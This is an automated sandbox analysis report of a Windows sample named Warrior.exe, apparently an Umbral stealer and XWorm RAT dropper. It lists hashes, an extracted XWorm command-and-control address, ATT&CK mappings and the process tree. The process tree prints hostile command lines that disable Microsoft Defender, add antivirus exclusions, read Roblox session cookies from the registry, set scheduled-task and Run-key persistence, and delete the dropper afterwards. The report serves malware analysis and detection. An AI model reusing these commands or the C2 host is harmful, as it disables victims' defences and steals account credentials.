Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-04-2024 22:43
Static task
static1
General
-
Target
Warrior.exe
-
Size
3.0MB
-
MD5
77af0ed58685722c2f9596fed1e5bd84
-
SHA1
0a09622ffbc63932f11af84934d256d5e790ffeb
-
SHA256
0545c17e579fc2df5185855e51425ec4d32da26075c02a0cf1af0221aa9b9a18
-
SHA512
e557de1d3a4115276520ed5775c7a6fb5688cf40021b62ed5243c03783d1ad09722190f0234006c16cb9978982541c4eabd6ffefbfc1d063d341d4cf620ff140
-
SSDEEP
3072:XVbxrc9pqjTrUWHdkxq+G3DmWuQk/moeRiR85MpMj:FbVQgzHkAyWunbje
Malware Config
Extracted
xworm
accommodation-confidentiality.gl.at.ply.gg:19058
-
Install_directory
%AppData%
-
install_file
svhost.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000002325b-7.dat family_umbral behavioral1/memory/536-22-0x000002A0FBD90000-0x000002A0FBDD0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000002325c-18.dat family_xworm behavioral1/memory/2424-29-0x0000000000C80000-0x0000000000C9A000-memory.dmp family_xworm -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts winadll.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Warrior.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WarriorX.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk WarriorX.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk WarriorX.exe -
Executes dropped EXE 4 IoCs
pid Process 536 winadll.exe 2424 WarriorX.exe 2248 svhost.exe 2260 svhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" WarriorX.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 discord.com 27 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com 9 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2152 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3100 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1796 PING.EXE -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 4480 powershell.exe 4480 powershell.exe 4480 powershell.exe 3760 powershell.exe 3760 powershell.exe 3760 powershell.exe 3308 powershell.exe 3308 powershell.exe 3308 powershell.exe 4464 powershell.exe 4464 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 4464 powershell.exe 1200 powershell.exe 1200 powershell.exe 4824 powershell.exe 4824 powershell.exe 1200 powershell.exe 4824 powershell.exe 2424 WarriorX.exe 2424 WarriorX.exe 404 powershell.exe 404 powershell.exe 404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2424 WarriorX.exe Token: SeDebugPrivilege 536 winadll.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 3760 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 4824 powershell.exe Token: SeIncreaseQuotaPrivilege 3472 wmic.exe Token: SeSecurityPrivilege 3472 wmic.exe Token: SeTakeOwnershipPrivilege 3472 wmic.exe Token: SeLoadDriverPrivilege 3472 wmic.exe Token: SeSystemProfilePrivilege 3472 wmic.exe Token: SeSystemtimePrivilege 3472 wmic.exe Token: SeProfSingleProcessPrivilege 3472 wmic.exe Token: SeIncBasePriorityPrivilege 3472 wmic.exe Token: SeCreatePagefilePrivilege 3472 wmic.exe Token: SeBackupPrivilege 3472 wmic.exe Token: SeRestorePrivilege 3472 wmic.exe Token: SeShutdownPrivilege 3472 wmic.exe Token: SeDebugPrivilege 3472 wmic.exe Token: SeSystemEnvironmentPrivilege 3472 wmic.exe Token: SeRemoteShutdownPrivilege 3472 wmic.exe Token: SeUndockPrivilege 3472 wmic.exe Token: SeManageVolumePrivilege 3472 wmic.exe Token: 33 3472 wmic.exe Token: 34 3472 wmic.exe Token: 35 3472 wmic.exe Token: 36 3472 wmic.exe Token: SeDebugPrivilege 2424 WarriorX.exe Token: SeIncreaseQuotaPrivilege 3472 wmic.exe Token: SeSecurityPrivilege 3472 wmic.exe Token: SeTakeOwnershipPrivilege 3472 wmic.exe Token: SeLoadDriverPrivilege 3472 wmic.exe Token: SeSystemProfilePrivilege 3472 wmic.exe Token: SeSystemtimePrivilege 3472 wmic.exe Token: SeProfSingleProcessPrivilege 3472 wmic.exe Token: SeIncBasePriorityPrivilege 3472 wmic.exe Token: SeCreatePagefilePrivilege 3472 wmic.exe Token: SeBackupPrivilege 3472 wmic.exe Token: SeRestorePrivilege 3472 wmic.exe Token: SeShutdownPrivilege 3472 wmic.exe Token: SeDebugPrivilege 3472 wmic.exe Token: SeSystemEnvironmentPrivilege 3472 wmic.exe Token: SeRemoteShutdownPrivilege 3472 wmic.exe Token: SeUndockPrivilege 3472 wmic.exe Token: SeManageVolumePrivilege 3472 wmic.exe Token: 33 3472 wmic.exe Token: 34 3472 wmic.exe Token: 35 3472 wmic.exe Token: 36 3472 wmic.exe Token: SeIncreaseQuotaPrivilege 5000 wmic.exe Token: SeSecurityPrivilege 5000 wmic.exe Token: SeTakeOwnershipPrivilege 5000 wmic.exe Token: SeLoadDriverPrivilege 5000 wmic.exe Token: SeSystemProfilePrivilege 5000 wmic.exe Token: SeSystemtimePrivilege 5000 wmic.exe Token: SeProfSingleProcessPrivilege 5000 wmic.exe Token: SeIncBasePriorityPrivilege 5000 wmic.exe Token: SeCreatePagefilePrivilege 5000 wmic.exe Token: SeBackupPrivilege 5000 wmic.exe Token: SeRestorePrivilege 5000 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2424 WarriorX.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 4176 wrote to memory of 536 4176 Warrior.exe 91 PID 4176 wrote to memory of 536 4176 Warrior.exe 91 PID 4176 wrote to memory of 2424 4176 Warrior.exe 92 PID 4176 wrote to memory of 2424 4176 Warrior.exe 92 PID 536 wrote to memory of 4180 536 winadll.exe 93 PID 536 wrote to memory of 4180 536 winadll.exe 93 PID 536 wrote to memory of 2356 536 winadll.exe 97 PID 536 wrote to memory of 2356 536 winadll.exe 97 PID 2424 wrote to memory of 4480 2424 WarriorX.exe 99 PID 2424 wrote to memory of 4480 2424 WarriorX.exe 99 PID 536 wrote to memory of 3760 536 winadll.exe 101 PID 536 wrote to memory of 3760 536 winadll.exe 101 PID 2424 wrote to memory of 3308 2424 WarriorX.exe 103 PID 2424 wrote to memory of 3308 2424 WarriorX.exe 103 PID 2424 wrote to memory of 4464 2424 WarriorX.exe 105 PID 2424 wrote to memory of 4464 2424 WarriorX.exe 105 PID 536 wrote to memory of 1964 536 winadll.exe 107 PID 536 wrote to memory of 1964 536 winadll.exe 107 PID 536 wrote to memory of 1200 536 winadll.exe 109 PID 536 wrote to memory of 1200 536 winadll.exe 109 PID 2424 wrote to memory of 4824 2424 WarriorX.exe 111 PID 2424 wrote to memory of 4824 2424 WarriorX.exe 111 PID 2424 wrote to memory of 2152 2424 WarriorX.exe 113 PID 2424 wrote to memory of 2152 2424 WarriorX.exe 113 PID 536 wrote to memory of 3472 536 winadll.exe 115 PID 536 wrote to memory of 3472 536 winadll.exe 115 PID 536 wrote to memory of 5000 536 winadll.exe 117 PID 536 wrote to memory of 5000 536 winadll.exe 117 PID 536 wrote to memory of 4400 536 winadll.exe 119 PID 536 wrote to memory of 4400 536 winadll.exe 119 PID 536 wrote to memory of 404 536 winadll.exe 121 PID 536 wrote to memory of 404 536 winadll.exe 121 PID 536 wrote to memory of 3100 536 winadll.exe 123 PID 536 wrote to memory of 3100 536 winadll.exe 123 PID 536 wrote to memory of 4216 536 winadll.exe 125 PID 536 wrote to memory of 4216 536 winadll.exe 125 PID 4216 wrote to memory of 1796 4216 cmd.exe 127 PID 4216 wrote to memory of 1796 4216 cmd.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4180 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Warrior.exe"C:\Users\Admin\AppData\Local\Temp\Warrior.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Users\Admin\AppData\Local\Temp\winadll.exe"C:\Users\Admin\AppData\Local\Temp\winadll.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\winadll.exe"3⤵
- Views/modifies file attributes
PID:4180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\winadll.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:4400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:404
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3100
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\winadll.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:1796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WarriorX.exe"C:\Users\Admin\AppData\Local\Temp\WarriorX.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WarriorX.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WarriorX.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"3⤵
- Creates scheduled task(s)
PID:2152
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1732 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:81⤵PID:5008
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe1⤵
- Executes dropped EXE
PID:2248
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe1⤵
- Executes dropped EXE
PID:2260
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
944B
MD565a68df1062af34622552c4f644a5708
SHA16f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA5124e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d
-
Filesize
944B
MD5dd1d0b083fedf44b482a028fb70b96e8
SHA1dc9c027937c9f6d52268a1504cbae42a39c8d36a
SHA256cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c
SHA51296bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973
-
Filesize
944B
MD53a6bad9528f8e23fb5c77fbd81fa28e8
SHA1f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD53505effaead0f06d098f1aec01836881
SHA194bafdbeb2f5adbd8cec709574df5b8dbcc5eba3
SHA2565d39a25ff8842c7c14aa14f99c5e3e1606fb7516c57f03dc41069df3c3de0517
SHA512934d8eab5bc2ec20e800c668f3c3434829feade4771918a22d712f7ba39f91f93877a1e9dc1beac966646af0c9dd2cf118041535143b3abc585fea8dfb1299f5
-
Filesize
76KB
MD5fb32e91cc34d5e0c6352930f5a2a285f
SHA162df943998e34c28269e9c6f8ee2182b2cbb4318
SHA2568e55921d7a4faf0365b3d3ebf79604fe0272bd0261108ec91b41d47a22cd13cb
SHA51231c8d7776b615457e405b827f1805ecc4d6e7e8d6c69004bd1a9fcefd863650d478c7b78042b00da470ba822e2746a54851ab344b5f616f54519215d15fbf828
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
231KB
MD589f302fc3a4099220cccb91a9ff7859a
SHA15587a4b0134b0f2427a7f0577d4ff77d733658d9
SHA256f1591132b9e3064c13801373dba6ae5d245981690f7639efbc3bb15a89354730
SHA512a7de469b8b1e93110f01b61c0f0d6d736f241ef5fc9e50fa2982ab6d85c445e12b4015b1734c3a8367ffb4a290824a208b5205f100ea8360e878c9358eb59c92